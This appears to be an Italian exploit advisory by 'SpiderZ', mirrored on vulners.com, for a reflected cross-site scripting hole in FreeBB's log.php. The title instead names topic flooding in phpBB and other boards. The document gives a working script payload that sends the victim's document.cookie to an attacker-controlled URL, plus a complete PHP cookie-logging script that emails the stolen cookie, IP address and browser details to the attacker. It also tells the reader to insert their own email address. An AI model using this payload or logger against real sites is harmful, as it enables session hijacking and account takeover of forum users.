View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb

2006-05-2500:00:00

vulners.com

       /      &#92;
    &#92;  &#92;  ,,  /  /
     &#39;-.&#96;&#92;&#40;&#41;/&#96;.-&#39;
    .--_&#39;&#40;  &#41;&#39;_--.
   / /&#96; /&#96;&quot;&quot;&#96;&#92; &#96;&#92; &#92;           * SpiderZ ForumZ Security *
    |  |  &gt;&lt;  |  |
    &#92;  &#92;      /  /
        &#39;.__.&#39;

• Xss Freebb ( All Version )
• Author: SpiderZ
• Sito: http://www.spiderz.altervista.org
• Sito2: https://www.spiderz.netsons.org

Xss freebb
Sito ufficiale frebb http://www.free-bb.com/fr/

Url : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma

XSS

nrw&la=">><script>document.location.replace('http://WWW.SITOWEB/FILE.php?c='+document.cookie);</script>

Url + xss : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma?nrw&la=">><script>document.location.replace('http://WWW.SITOWEB.COM/FILE.php?c='+document.cookie);</script>

Log cookie ( Exploit.php )

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$accept=$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$cookie = $_GET['c'];
$myemail = "LA TUA E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss fre-bb" ;
$message = "Xss free-bb
Ip: $ip
Cookie: $cookie
Browser: $userAgent
Lingua: $accept
Url: $base
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>

Modifica : $myemail = "LA TUA E-MAIL";

es: [email protected]

JSON